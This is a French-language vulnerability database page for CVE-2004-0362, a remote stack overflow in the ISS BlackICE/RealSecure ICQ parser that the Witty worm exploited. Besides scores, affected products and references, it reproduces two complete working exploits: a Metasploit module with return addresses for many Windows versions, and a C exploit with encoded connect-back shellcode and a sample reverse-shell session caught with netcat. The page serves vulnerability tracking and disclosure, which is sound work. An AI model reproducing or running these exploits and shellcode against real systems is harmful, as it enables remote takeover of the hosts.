CVE-2004-0362

EPSS

75.73%V4

Vecteur

Network

Publié

2004-03-23
04h00 +00:00

Modifié

2017-07-10
12h57 +00:00

Liens officiels

CVE.org

NVD

Notifications pour un CVE

Restez informé de toutes modifications pour un CVE spécifique.

Gestion des notifications

Liste des Notifications

Notifications pour un CVE

Restez informé de toutes modifications pour un CVE spécifique.

Critères appliqués l'envoi de l'alerte : par rapport à la dernière alerte envoyée + différences au niveau de CISA, EPSS, CVSS, CWE, Solutions, CPE.

Paramètres

Vous pouvez spécifier un titre qui sera récupéré dans les alertes qui seront envoyées.

Spécifiez ici un CVE ID comme CVE-2025-1234

Planifications

Mois

Prochaine exécution calculée

Jour

Jour de la semaine

Heure

Minute

Date de création

Dernière exécution

Prochaine exécution

Fonctionnalité nécessitant une connexion

Cette fonctionnalité qui vous permet de recevoir des alertes, n'est active que lorsque vous êtes connecté à votre compte.

Descriptions du CVE

Multiple stack-based buffer overflows in the ICQ parsing routines of the ISS Protocol Analysis Module (PAM) component, as used in various RealSecure, Proventia, and BlackICE products, allow remote attackers to execute arbitrary code via a SRV_MULTI response containing a SRV_USER_ONLINE response packet and a SRV_META_USER response packet with long (1) nickname, (2) firstname, (3) lastname, or (4) email address fields, as exploited by the Witty worm.

Informations du CVE

Métriques

Métriques	Score	Gravité	CVSS Vecteur	Source
V2	7.5		AV:N/AC:L/Au:N/C:P/I:P/A:P	nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	87.66%	–	–
2023-03-12	–	–	–	95.69%	–
2023-10-01	–	–	–	96.02%	–
2024-04-07	–	–	–	96.16%	–
2024-06-02	–	–	–	96.16%	–
2024-09-01	–	–	–	96.01%	–
2024-12-22	–	–	–	96.95%	–
2025-01-19	–	–	–	96.95%	–
2025-03-18	–	–	–	–	79.31%
2025-03-30	–	–	–	–	75.73%
2025-03-30	–	–	–	–	75.73,%

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

EPSS First.org

Date	Percentile
2022-02-06	1%
2023-03-12	99%
2023-10-01	99%
2024-04-07	99%
2024-06-02	1%
2024-09-01	1%
2024-12-22	1%
2025-01-19	1%
2025-03-18	99%
2025-03-30	99%
2025-03-30	99%

Informations sur l'Exploit

Exploit Database EDB-ID : 16464

Date de publication : 2010-09-19 22h00 +00:00
Auteur : Metasploit
EDB Vérifié : Yes

## # $Id: blackice_pam_icq.rb 10394 2010-09-20 08:06:27Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Udp def initialize(info = {}) super(update_info(info, 'Name' => 'ISS PAM.dll ICQ Parser Buffer Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in the ISS products that use the iss-pam1.dll ICQ parser (Blackice/RealSecure). Successful exploitation will result in arbitrary code execution as LocalSystem. This exploit only requires 1 UDP packet, which can be both spoofed and sent to a broadcast address. The ISS exception handler will recover the process after each overflow, giving us the ability to bruteforce the service and exploit it multiple times. }, 'Author' => 'spoonm', 'License' => MSF_LICENSE, 'Version' => '$Revision: 10394 $', 'References' => [ ['CVE', '2004-0362'], ['OSVDB', '4355'], ['URL', 'http://www.eeye.com/html/Research/Advisories/AD20040318.html'], ['URL', 'http://xforce.iss.net/xforce/alerts/id/166'], ], 'Payload' => { 'Space' => 504 -31 -4, 'BadChars' => "\x00", 'MinNops' => 0, 'MaxNops' => 0, 'StackAdjustment' => -3500 }, 'Platform' => 'win', 'Targets' => [ [ 'Bruteforce', { } ], [ 'Bruteforce iis-pam1.dll', { 'Targets' => 3 .. 4 } ], [ 'Bruteforce NT 4.0', { 'Targets' => 5 .. 15 } ], [ 'iis-pam1.dll 3.6.06', { 'Ret' => 0x5e0a47ef } ], [ 'iis-pam1.dll 3.6.11', { 'Ret' => 0x5e0da1db } ], [ 'WinNT SP3/SP4/SP5', { 'Ret' => 0x777e79ab } ], [ 'WinNT SP4/SP5', { 'Ret' => 0x7733b8db } ], [ 'WinNT SP5/SP6 - advapi32', { 'Ret' => 0x77dcd1cb } ], [ 'WinNT SP3/SP5/SP6 - shell32', { 'Ret' => 0x77cec080 } ], [ 'WinNT SP5/SP6 - mswsock', { 'Ret' => 0x7767ebca } ], [ 'WinXP SP0/SP1 - shell32', { 'Ret' => 0x776606af } ], [ 'WinXP SP0/SP1 - atl', { 'Ret' => 0x76b305a7 } ], [ 'WinXP SP0/SP1 - atl', { 'Ret' => 0x76e61a21 } ], [ 'WinXP SP0/SP1 - ws2_32', { 'Ret' => 0x71ab7bfb } ], [ 'WinXP SP0/SP1 - mswsock', { 'Ret' => 0x71a5403d } ], [ 'Windows 2000 Pro SP4 English', { 'Ret' => 0x7c2ec68b } ], [ 'Win2000 SP0 - SP4', { 'Ret' => 0x750231e2 } ], [ 'Win2000 SP2/SP3 - samlib', { 'Ret' => 0x75159da3 } ], [ 'Win2000 SP0/SP1 - activeds', { 'Ret' => 0x77ed0beb } ], [ 'Windows XP Pro SP0 English', { 'Ret' => 0x77e3171b } ], [ 'Windows XP Pro SP1 English', { 'Ret' => 0x77dc5527 } ], [ 'WinXP SP0 - SP1', { 'Ret' => 0x71aa3a4b } ], [ 'Win2003 SP0', { 'Ret' => 0x71bf3cc9 } ], ], 'DisclosureDate' => 'Mar 18 2004', 'DefaultTarget' => 0)) register_options( [ Opt::RPORT(1) ], self.class) end def exploit datastore['RPORT'] = rand(65536) if rport == 1 targs = [ target ] if target.name =~ /^Brute/ if target['Targets'] targs = [] target['Targets'].each { |idx| targs << targets[idx] } else targs = targets.dup targs.delete_at(0) targs.delete_at(0) targs.delete_at(0) end end targs.each { |targ| print_status("Trying target #{targ.name} [#{"%.8x" % targ.ret}]...") shellcode = payload.encoded + rand_text_english(payload_space - payload.encoded.length) email = rand_text_english(19) + [targ.ret].pack('V') + shellcode # Hopefully this structure is correct -- ported from msf 2. Blame me # (skape) if it doesn't work! packet = # SRV_MULTI [5, 0, 0, 530, 0, 0, 1161044754, 0, 2].pack('vcVvvvVVc') + # SRV_USER_ONLINE [5, 0, 0, 110, 0, 0, 1161044754, 0].pack('vcVvvvVV') + [1161044754, 1, 0, 0, 0, 0, 0].pack('VVVVcVV') + # SRV_META_USER [5, 0, 0, 990, 0, 0, 2018915346, 0].pack('vcVvvvVV') + "\x00\x00\x0a" + # subcommand / success "\x00\x00" + # nick length / nick "\x00\x00" + # first length / first "\x00\x00" + # last length / last [email.length].pack('v') + email + "\x00\x00\x00\x00\x00\x00\x00" print_status("Sending UDP request to #{datastore['RPORT']} (#{packet.length} bytes)") connect_udp(true, { 'CPORT' => 4000 }) udp_sock.put(packet) disconnect_udp print_status("Sleeping (giving exception handler time to recover)") select(nil,nil,nil,5) } end end

Exploit Database EDB-ID : 168

Date de publication : 2004-03-27 23h00 +00:00
Auteur : Sam
EDB Vérifié : Yes

/* 557iss_pam_exp - RealSecure / Blackice ICQ iss_pam1.dll remote overflow exploit * * Copyright (c) SST 2004 All rights reserved. * * Public version * * code by Sam (Sam`@efnet) and 2004/03/26 * <chen_xiaobo@venustech.com.cn> * <Sam@0x557.org> * * * * Compile: gcc -o 557iss_pam_exp 557iss_pam_exp.c * * how works? * [root@core exp]# ./557iss_pam_exp 192.168.10.2 192.168.10.169 5570 * 557iss_pam_exp - RealSecure / Blackice iss_pam1.dll remote overflow exploit * - Sam * * # attack remote host: 192.168.10.2. * # listen host: 192.168.10.169. * # listen port: 5570. * # send overflow udp datas * # 1199 bytes send * # done. * # make sure we are in, dude :) * * * [root@core root]# nc -vv -l -p 5570 * listening on [any] 5570 ... * 192.168.10.2: inverse host lookup failed: Host name lookup failure * connect to [192.168.10.169] from (UNKNOWN) [192.168.10.2] 3604 * Microsoft Windows XP [Version 5.1.2600] * (C) Copyright 1985-2001 Microsoft Corp. * * C:\Program Files\ISS\BlackICE> * C:\Program Files\ISS\BlackICE> * C:\Program Files\ISS\BlackICE> * * * some thanks/greets to: * eeye (they find this bug :D), airsupply, kkqq, icbm, my gf :I * and everyone else who's KNOW SST ;P * http://0x557.org */ #include <stdio.h> #include <unistd.h> #include <stdarg.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <netinet/tcp.h> #include <arpa/inet.h> #include <netdb.h> #include <stdlib.h> #include <errno.h> #include <string.h> #include <assert.h> #include <fcntl.h> #include <sys/time.h> char icq_header [] = "\x05\x00" // ICQ VERSION "\x00" // unused "\x00\x00\x00\x00" // Session ID "\x12\x02" // reply to SRV_MULTI_PACKET "\x00\x00\x00\x00" // SEQ_NUM1 and SEQ_NUM2 "\x00\x00\x00\x00" // UIN Your (the client's) UIN "\x00\x00\x00\x00" // CHECKCODE "\x02" // SRV_MULTI Parameter Block 1 of 2 // Number of individual responses "\x2c\x00" // Size of sub-response (44 bytes, little-endian) "\x05\x00" // ICQ VERSION "\x00" // unused "\x00\x00\x00\x00" // Session ID "\x6e\x00" // reply to SRV_USER_OLINE "\x00\x00\x00\x00" // SEQ_NUM1 and SEQ_NUM2 "\x00\x00\x00\x00" // UIN Your (the client's) UIN "\x00\x00\x00\x00" // CHECKCODE "\x00\x00\x00\x00" // UIN of user changing status "\x01\x00\x00\x00" // Other user's IP address (1.0.0.0) "\x00\x00\x00\x00" // Other user's direct-connect port (default) "\x00" "\x00\x00\x00\x00" "\x00\x00\x00\x00" "\x00\x00" "\x41\x02" // SRV_MULTI Parameter Block 2 of 2 // Size of sub-response (577 bytes) "\x05\x00" // ICQ VERSION "\x00" // unused "\x00\x00\x00\x00" // Session ID "\xde\x03" // reply to SRV_META_USER "\x00\x00\x00\x00" // SEQ_NUM1 and SEQ_NUM2 "\x00\x00\x00\x00" // UIN Your (the client's) UIN "\x00\x00\x00\x00" // CHECKCODE "\x00\x00\x00\x01" "\x00\x00\x01\x00" "\x00\x01\x00\x00" "\x1e\x02"; struct sockaddr_in addr, local; char *bindHost = NULL; unsigned short port; /* * hsj's connect back shellcodes */ char shellcode [] = /* decoder */ "\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x58\x83\xc0\x1b\x8d\xa0\x01" "\xfc\xff\xff\x83\xe4\xfc\x8b\xec\x33\xc9\x66\xb9\x99\x01\x80\x30" "\x93\x40\xe2\xfa" /* code */ "\x7b\xe4\x93\x93\x93\xd4\xf6\xe7\xc3\xe1\xfc\xf0\xd2\xf7\xf7\xe1" "\xf6\xe0\xe0\x93\xdf\xfc\xf2\xf7\xdf\xfa\xf1\xe1\xf2\xe1\xea\xd2" "\x93\xd0\xe1\xf6\xf2\xe7\xf6\xc3\xe1\xfc\xf0\xf6\xe0\xe0\xd2\x93" "\xd0\xff\xfc\xe0\xf6\xdb\xf2\xfd\xf7\xff\xf6\x93\xd6\xeb\xfa\xe7" "\xc7\xfb\xe1\xf6\xf2\xf7\x93\xe4\xe0\xa1\xcc\xa0\xa1\x93\xc4\xc0" "\xd2\xc0\xe7\xf2\xe1\xe7\xe6\xe3\x93\xc4\xc0\xd2\xc0\xfc\xf0\xf8" "\xf6\xe7\xd2\x93\xf0\xff\xfc\xe0\xf6\xe0\xfc\xf0\xf8\xf6\xe7\x93" "\xf0\xfc\xfd\xfd\xf6\xf0\xe7\x93\xf0\xfe\xf7\x93\xc9\xc1\x28\x93" "\x93\x63\xe4\x12\xa8\xde\xc9\x03\x93\xe7\x90\xd8\x78\x66\x18\xe0" "\xaf\x90\x60\x18\xe5\xeb\x90\x60\x18\xed\xb3\x90\x68\x18\xdd\x87" "\xc5\xa0\x53\xc4\xc2\x18\xac\x90\x68\x18\x61\xa0\x5a\x22\x9d\x60" "\x35\xca\xcc\xe7\x9b\x10\x54\x97\xd3\x71\x7b\x6c\x72\xcd\x18\xc5" "\xb7\x90\x40\x42\x73\x90\x51\xa0\x5a\xf5\x18\x9b\x18\xd5\x8f\x90" "\x50\x52\x72\x91\x90\x52\x18\x83\x90\x40\xcd\x18\x6d\xa0\x5a\x22" "\x97\x7b\x08\x93\x93\x93\x10\x55\x98\xc1\xc5\x6c\xc4\x63\xc9\x18" "\x4b\xa0\x5a\x22\x97\x7b\x14\x93\x93\x93\x10\x55\x9b\xc6\xfb\x92" "\x92\x93\x93\x6c\xc4\x63\x16\x53\xe6\xe0\xc3\xc3\xc3\xc3\xd3\xc3" "\xd3\xc3\x6c\xc4\x67\x10\x6b\x6c\xe7\xf0\x18\x4b\xf5\x54\xd6\x93" "\x91\x93\xf5\x54\xd6\x91\x28\x39\x54\xd6\x97\x4e\x5f\x28\x39\xf9" "\x83\xc6\xc0\x6c\xc4\x6f\x16\x53\xe6\xd0\xa0\x5a\x22\x82\xc4\x18" "\x6e\x60\x38\xcc\x54\xd6\x93\xd7\x93\x93\x93\x1a\xce\xaf\x1a\xce" "\xab\x1a\xce\xd3\x54\xd6\xbf\x92\x92\x93\x93\x1e\xd6\xd7\xc3\xc6" "\xc2\xc2\xc2\xd2\xc2\xda\xc2\xc2\xc5\xc2\x6c\xc4\x77\x6c\xe6\xd7" "\x6c\xc4\x7b\x6c\xe6\xdb\x6c\xc4\x7b\xc0\x6c\xc4\x6b\xc3\x6c\xc4" "\x7f\x19\x95\xd5\x17\x53\xe6\x6a\xc2\xc1\xc5\xc0\x6c\x41\xc9\xca" "\x1a\x94\xd4\xd4\xd4\xd4\x71\x7a\x50"; /* udpconnect: * */ int udpConnect (char *hostName) { struct hostent* host = NULL; int sock = -1; host = gethostbyname (hostName); if (NULL == host) { perror ("gethostbyname() failed"); return -1; } sock = socket (AF_INET, SOCK_DGRAM, IPPROTO_UDP); if ( -1 == sock) { perror ("socket() failed\n"); return -1; } memset (&addr, 0x00, sizeof (addr)); addr.sin_addr = *(struct in_addr *) host->h_addr; addr.sin_family = AF_INET; addr.sin_port = htons(random()); memset (&local, 0x00, sizeof (local)); local.sin_family = AF_INET; local.sin_addr.s_addr = htonl (INADDR_ANY); local.sin_port = htons(4000); if (bind (sock, (struct sockaddr *) &local, sizeof(local)) != 0) { perror ("bind error\n"); return -1; } return sock; } /* resolve listen host */ unsigned int resolve (char *name) { struct hostent *he; unsigned int ip; if ((ip = inet_addr (name)) == (-1)) { if ((he = gethostbyname (name)) ==0 ) return 0; memcpy (&ip, he->h_addr, 4); } return ip; } /* * send datas */ int udp_send (int sock, char *buffer, int buff_len) { int ret; ret = sendto (sock, buffer, buff_len, 0, (struct sockaddr *)&addr, sizeof (struct sockaddr_in)); if (ret <= NULL) { perror ("sendto failed\n"); return -1; } fprintf (stderr, "# %d bytes send\n", ret); return ret; } /* * send evil datas, fuck ISS's blackice. */ int do_sendudp_data (char *hostName) { unsigned int cb; int sock; char expbuf[1200]; memset (expbuf, 0x90, sizeof (expbuf)); memcpy (expbuf, icq_header, sizeof (icq_header) - 1); /* * jmp esp opcodes from iss_pam1.dll */ *(unsigned int *)&expbuf[637] = 0x5e077663; if (!(cb = resolve (bindHost))) { printf ("Unknown listen host\n"); return -1; } port = htons (port); port ^= 0x9393; cb ^= 0x93939393; *(unsigned short *)&shellcode[330] = port; *(unsigned int *)&shellcode[335] = cb; memcpy (expbuf + 637 + 4, shellcode, strlen (shellcode)); if ((sock = udpConnect (hostName)) < 0) { printf ("connect failed\n"); exit (-1); } fprintf (stderr, "# send overflow udp datas\n"); udp_send (sock, expbuf, sizeof (expbuf) - 1); close (sock); return 0; } /* * just main . dude. */ int main (int argc, char **argv) { int new; char *target = NULL; fprintf (stderr, "557iss_pam_exp - RealSecure / Blackice iss_pam1.dll remote overflow exploit\n - Sam\n\n"); if (argc != 4) { fprintf (stderr, "%s <hostname> <listenhost> <listen port>\n", argv[0]); fprintf (stderr, "listenhost, port: connect back host and port\n\n"); return -1; } target = argv[1]; bindHost = argv[2]; port = atoi (argv[3]); fprintf (stderr, "# attack remote host: %s. \n", target); fprintf (stderr, "# listen host: %s. \n", bindHost); fprintf (stderr, "# listen port: %d. \n", port); do_sendudp_data (target); fprintf (stderr, "# done.\n"); fprintf (stderr, "# make sure we are in, dude :)\n\n"); return 0; } // milw0rm.com [2004-03-28]

Products Mentioned

Configuraton 0

Iss>>Blackice_agent_server >> Version 3.6ebz

Iss>>Blackice_agent_server >> Version 3.6ebz (Open CPE detail)

Iss>>Blackice_agent_server >> Version 3.6eca

Iss>>Blackice_agent_server >> Version 3.6eca (Open CPE detail)

Iss>>Blackice_agent_server >> Version 3.6ecb

Iss>>Blackice_agent_server >> Version 3.6ecb (Open CPE detail)

Iss>>Blackice_agent_server >> Version 3.6ecc

Iss>>Blackice_agent_server >> Version 3.6ecc (Open CPE detail)

Iss>>Blackice_agent_server >> Version 3.6ecd

Iss>>Blackice_agent_server >> Version 3.6ecd (Open CPE detail)

Iss>>Blackice_agent_server >> Version 3.6ece

Iss>>Blackice_agent_server >> Version 3.6ece (Open CPE detail)

Iss>>Blackice_agent_server >> Version 3.6ecf

Iss>>Blackice_agent_server >> Version 3.6ecf (Open CPE detail)

Iss>>Blackice_pc_protection >> Version 3.6cbz

Iss>>Blackice_pc_protection >> Version 3.6cbz (Open CPE detail)

Iss>>Blackice_pc_protection >> Version 3.6cca

Iss>>Blackice_pc_protection >> Version 3.6cca (Open CPE detail)

Iss>>Blackice_pc_protection >> Version 3.6ccb

Iss>>Blackice_pc_protection >> Version 3.6ccb (Open CPE detail)

Iss>>Blackice_pc_protection >> Version 3.6ccc

Iss>>Blackice_pc_protection >> Version 3.6ccc (Open CPE detail)

Iss>>Blackice_pc_protection >> Version 3.6ccd

Iss>>Blackice_pc_protection >> Version 3.6ccd (Open CPE detail)

Iss>>Blackice_pc_protection >> Version 3.6cce

Iss>>Blackice_pc_protection >> Version 3.6cce (Open CPE detail)

Iss>>Blackice_pc_protection >> Version 3.6ccf

Iss>>Blackice_pc_protection >> Version 3.6ccf (Open CPE detail)

Iss>>Blackice_server_protection >> Version 3.6cbz

Iss>>Blackice_server_protection >> Version 3.6cbz (Open CPE detail)

Iss>>Blackice_server_protection >> Version 3.6cca

Iss>>Blackice_server_protection >> Version 3.6cca (Open CPE detail)

Iss>>Blackice_server_protection >> Version 3.6ccb

Iss>>Blackice_server_protection >> Version 3.6ccb (Open CPE detail)

Iss>>Blackice_server_protection >> Version 3.6ccc

Iss>>Blackice_server_protection >> Version 3.6ccc (Open CPE detail)

Iss>>Blackice_server_protection >> Version 3.6ccd

Iss>>Blackice_server_protection >> Version 3.6ccd (Open CPE detail)

Iss>>Blackice_server_protection >> Version 3.6cce

Iss>>Blackice_server_protection >> Version 3.6cce (Open CPE detail)

Iss>>Blackice_server_protection >> Version 3.6ccf

Iss>>Blackice_server_protection >> Version 3.6ccf (Open CPE detail)

Iss>>Realsecure_desktop >> Version 3.6ebz

Iss>>Realsecure_desktop >> Version 3.6ebz (Open CPE detail)

Iss>>Realsecure_desktop >> Version 3.6eca

Iss>>Realsecure_desktop >> Version 3.6eca (Open CPE detail)

Iss>>Realsecure_desktop >> Version 3.6ecb

Iss>>Realsecure_desktop >> Version 3.6ecb (Open CPE detail)

Iss>>Realsecure_desktop >> Version 3.6ecd

Iss>>Realsecure_desktop >> Version 3.6ecd (Open CPE detail)

Iss>>Realsecure_desktop >> Version 3.6ece

Iss>>Realsecure_desktop >> Version 3.6ece (Open CPE detail)

Iss>>Realsecure_desktop >> Version 3.6ecf

Iss>>Realsecure_desktop >> Version 3.6ecf (Open CPE detail)

Iss>>Realsecure_desktop >> Version 7.0eba

Iss>>Realsecure_desktop >> Version 7.0eba (Open CPE detail)

Iss>>Realsecure_desktop >> Version 7.0ebf

Iss>>Realsecure_desktop >> Version 7.0ebf (Open CPE detail)

Iss>>Realsecure_desktop >> Version 7.0ebg

Iss>>Realsecure_desktop >> Version 7.0ebg (Open CPE detail)

Iss>>Realsecure_desktop >> Version 7.0ebh

Iss>>Realsecure_desktop >> Version 7.0ebh (Open CPE detail)

Iss>>Realsecure_desktop >> Version 7.0ebj

Iss>>Realsecure_desktop >> Version 7.0ebj (Open CPE detail)

Iss>>Realsecure_desktop >> Version 7.0ebk

Iss>>Realsecure_desktop >> Version 7.0ebk (Open CPE detail)

Iss>>Realsecure_desktop >> Version 7.0ebl

Iss>>Realsecure_desktop >> Version 7.0ebl (Open CPE detail)

Iss>>Realsecure_guard >> Version 3.6ebz

Iss>>Realsecure_guard >> Version 3.6ebz (Open CPE detail)

Iss>>Realsecure_guard >> Version 3.6eca

Iss>>Realsecure_guard >> Version 3.6eca (Open CPE detail)

Iss>>Realsecure_guard >> Version 3.6ecb

Iss>>Realsecure_guard >> Version 3.6ecb (Open CPE detail)

Iss>>Realsecure_guard >> Version 3.6ecc

Iss>>Realsecure_guard >> Version 3.6ecc (Open CPE detail)

Iss>>Realsecure_guard >> Version 3.6ecd

Iss>>Realsecure_guard >> Version 3.6ecd (Open CPE detail)

Iss>>Realsecure_guard >> Version 3.6ece

Iss>>Realsecure_guard >> Version 3.6ece (Open CPE detail)

Iss>>Realsecure_guard >> Version 3.6ecf

Iss>>Realsecure_guard >> Version 3.6ecf (Open CPE detail)

Iss>>Realsecure_network_sensor >> Version 7.0

Iss>>Realsecure_network_sensor >> Version 7.0 (Open CPE detail)

Iss>>Realsecure_network_sensor >> Version 7.0

Iss>>Realsecure_sentry >> Version 3.6ebz

Iss>>Realsecure_sentry >> Version 3.6ebz (Open CPE detail)

Iss>>Realsecure_sentry >> Version 3.6eca

Iss>>Realsecure_sentry >> Version 3.6eca (Open CPE detail)

Iss>>Realsecure_sentry >> Version 3.6ecb

Iss>>Realsecure_sentry >> Version 3.6ecb (Open CPE detail)

Iss>>Realsecure_sentry >> Version 3.6ecc

Iss>>Realsecure_sentry >> Version 3.6ecc (Open CPE detail)

Iss>>Realsecure_sentry >> Version 3.6ecd

Iss>>Realsecure_sentry >> Version 3.6ecd (Open CPE detail)

Iss>>Realsecure_sentry >> Version 3.6ece

Iss>>Realsecure_sentry >> Version 3.6ece (Open CPE detail)

Iss>>Realsecure_sentry >> Version 3.6ecf

Iss>>Realsecure_sentry >> Version 3.6ecf (Open CPE detail)

Iss>>Realsecure_server_sensor >> Version 6.0

Iss>>Realsecure_server_sensor >> Version 6.0.1

Iss>>Realsecure_server_sensor >> Version 6.0.1_win_sr1.1

Iss>>Realsecure_server_sensor >> Version 6.5

Iss>>Realsecure_server_sensor >> Version 6.5_win_sr3.1

Iss>>Realsecure_server_sensor >> Version 6.5_win_sr3.4

Iss>>Realsecure_server_sensor >> Version 6.5_win_sr3.5

Iss>>Realsecure_server_sensor >> Version 6.5_win_sr3.6

Iss>>Realsecure_server_sensor >> Version 6.5_win_sr3.7

Iss>>Realsecure_server_sensor >> Version 6.5_win_sr3.8

Iss>>Realsecure_server_sensor >> Version 6.5_win_sr3.9

Iss>>Realsecure_server_sensor >> Version 6.5_win_sr3.10

Iss>>Realsecure_server_sensor >> Version 7.0

Configuraton 0

Iss>>Proventia_a_series_xpu >> Version 20.11

Iss>>Proventia_a_series_xpu >> Version 20.11 (Open CPE detail)

Iss>>Proventia_a_series_xpu >> Version 22.1

Iss>>Proventia_a_series_xpu >> Version 22.1 (Open CPE detail)

Iss>>Proventia_a_series_xpu >> Version 22.2

Iss>>Proventia_a_series_xpu >> Version 22.2 (Open CPE detail)

Iss>>Proventia_a_series_xpu >> Version 22.3

Iss>>Proventia_a_series_xpu >> Version 22.3 (Open CPE detail)

Iss>>Proventia_a_series_xpu >> Version 22.4

Iss>>Proventia_a_series_xpu >> Version 22.4 (Open CPE detail)

Iss>>Proventia_a_series_xpu >> Version 22.5

Iss>>Proventia_a_series_xpu >> Version 22.5 (Open CPE detail)

Iss>>Proventia_a_series_xpu >> Version 22.6

Iss>>Proventia_a_series_xpu >> Version 22.6 (Open CPE detail)

Iss>>Proventia_a_series_xpu >> Version 22.7

Iss>>Proventia_a_series_xpu >> Version 22.7 (Open CPE detail)

Iss>>Proventia_a_series_xpu >> Version 22.8

Iss>>Proventia_a_series_xpu >> Version 22.8 (Open CPE detail)

Iss>>Proventia_a_series_xpu >> Version 22.9

Iss>>Proventia_a_series_xpu >> Version 22.9 (Open CPE detail)

Iss>>Proventia_a_series_xpu >> Version 22.10

Iss>>Proventia_a_series_xpu >> Version 22.10 (Open CPE detail)

Iss>>Proventia_g_series_xpu >> Version 22.1

Iss>>Proventia_g_series_xpu >> Version 22.1 (Open CPE detail)

Iss>>Proventia_g_series_xpu >> Version 22.2

Iss>>Proventia_g_series_xpu >> Version 22.2 (Open CPE detail)

Iss>>Proventia_g_series_xpu >> Version 22.3

Iss>>Proventia_g_series_xpu >> Version 22.3 (Open CPE detail)

Iss>>Proventia_g_series_xpu >> Version 22.4

Iss>>Proventia_g_series_xpu >> Version 22.4 (Open CPE detail)

Iss>>Proventia_g_series_xpu >> Version 22.5

Iss>>Proventia_g_series_xpu >> Version 22.5 (Open CPE detail)

Iss>>Proventia_g_series_xpu >> Version 22.6

Iss>>Proventia_g_series_xpu >> Version 22.6 (Open CPE detail)

Iss>>Proventia_g_series_xpu >> Version 22.7

Iss>>Proventia_g_series_xpu >> Version 22.7 (Open CPE detail)

Iss>>Proventia_g_series_xpu >> Version 22.8

Iss>>Proventia_g_series_xpu >> Version 22.8 (Open CPE detail)

Iss>>Proventia_g_series_xpu >> Version 22.9

Iss>>Proventia_g_series_xpu >> Version 22.9 (Open CPE detail)

Iss>>Proventia_g_series_xpu >> Version 22.10

Iss>>Proventia_g_series_xpu >> Version 22.10 (Open CPE detail)

Iss>>Proventia_g_series_xpu >> Version 22.11

Iss>>Proventia_g_series_xpu >> Version 22.11 (Open CPE detail)

Iss>>Proventia_m_series_xpu >> Version 1.1

Iss>>Proventia_m_series_xpu >> Version 1.1 (Open CPE detail)

Iss>>Proventia_m_series_xpu >> Version 1.2

Iss>>Proventia_m_series_xpu >> Version 1.2 (Open CPE detail)

Iss>>Proventia_m_series_xpu >> Version 1.3

Iss>>Proventia_m_series_xpu >> Version 1.3 (Open CPE detail)

Iss>>Proventia_m_series_xpu >> Version 1.4

Iss>>Proventia_m_series_xpu >> Version 1.4 (Open CPE detail)

Iss>>Proventia_m_series_xpu >> Version 1.5

Iss>>Proventia_m_series_xpu >> Version 1.5 (Open CPE detail)

Iss>>Proventia_m_series_xpu >> Version 1.6

Iss>>Proventia_m_series_xpu >> Version 1.6 (Open CPE detail)

Iss>>Proventia_m_series_xpu >> Version 1.7

Iss>>Proventia_m_series_xpu >> Version 1.7 (Open CPE detail)

Iss>>Proventia_m_series_xpu >> Version 1.8

Iss>>Proventia_m_series_xpu >> Version 1.8 (Open CPE detail)

Iss>>Proventia_m_series_xpu >> Version 1.9

Iss>>Proventia_m_series_xpu >> Version 1.9 (Open CPE detail)

Références

http://xforce.iss.net/xforce/alerts/id/166
Tags : third-party-advisory, x_refsource_ISS

http://www.securityfocus.com/bid/9913
Tags : vdb-entry, x_refsource_BID

http://secunia.com/advisories/11073
Tags : third-party-advisory, x_refsource_SECUNIA

http://www.ciac.org/ciac/bulletins/o-104.shtml
Tags : third-party-advisory, government-resource, x_refsource_CIAC

http://www.eeye.com/html/Research/Advisories/AD20040318.html
Tags : third-party-advisory, x_refsource_EEYE

https://exchange.xforce.ibmcloud.com/vulnerabilities/15442
Tags : vdb-entry, x_refsource_XF

http://www.osvdb.org/4355
Tags : vdb-entry, x_refsource_OSVDB

http://www.kb.cert.org/vuls/id/947254
Tags : third-party-advisory, x_refsource_CERT-VN

http://marc.info/?l=bugtraq&m=107965651712378&w=2
Tags : mailing-list, x_refsource_BUGTRAQ

https://exchange.xforce.ibmcloud.com/vulnerabilities/15543
Tags : vdb-entry, x_refsource_XF

CVE-2004-0362 : Détail

CVE-2004-0362

Descriptions du CVE

Informations du CVE

Métriques

EPSS

Score EPSS

Percentile EPSS

Informations sur l'Exploit

Exploit Database EDB-ID : 16464

Exploit Database EDB-ID : 168

Products Mentioned

Configuraton 0

Configuraton 0

Références